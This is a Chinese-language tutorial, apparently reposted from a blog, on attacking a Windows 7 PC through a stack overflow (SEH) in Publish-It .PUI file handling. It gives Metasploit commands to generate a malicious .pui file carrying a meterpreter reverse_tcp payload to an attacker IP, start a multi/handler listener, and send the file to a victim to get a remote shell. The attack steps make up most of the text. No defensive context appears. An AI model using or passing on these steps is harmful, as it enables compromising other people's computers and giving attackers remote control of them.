使用Publish-It PUI Buffer Overflow(SEH)破解远程Windows PC

在处理特制的.PUI文件时,此模块利用Publish-It中基于堆栈的缓冲区溢出。远程攻击者可利用此漏洞通过诱使Publish-It用户打开恶意.PUI文件来在目标计算机上执行任意代码。
利用目标
发布 - 它
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole
使用Publish-It PUI Buffer Overflow(SEH)破解远程Windows PC
现在输入  exploit use / windows / fileformat / publishit_pui
msf exploit (publishit_pui)>set payload windows/meterpreter/reverse_tcp
msf exploit (publishit_pui)>set lhost 192.168.1.5 (本机的ip)
msf exploit (publishit_pui)>exploit  
使用Publish-It PUI Buffer Overflow(SEH)破解远程Windows PC
在我们成功生成恶意  pui文件后,它将存储在您的本地计算机上
/root/.msf4/local/msf.pui
使用Publish-It PUI Buffer Overflow(SEH)破解远程Windows PC
现在我们需要设置一个监听器来处理攻击成功执行时受害者发送的反向连接。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.5
exploit
现在 ,只要下载并打开它们,就会将msf.pui文件发送  给受害者。现在您可以访问受害计算机上的meterpreter shell
使用Publish-It PUI Buffer Overflow(SEH)破解远程Windows PC
使用Publish-It PUI Buffer Overflow(SEH)破解远程Windows PC
转载请注明本文链接: http://www.mayidui.net/t2413.html
游客
登录后才可以回帖,登录 或者 注册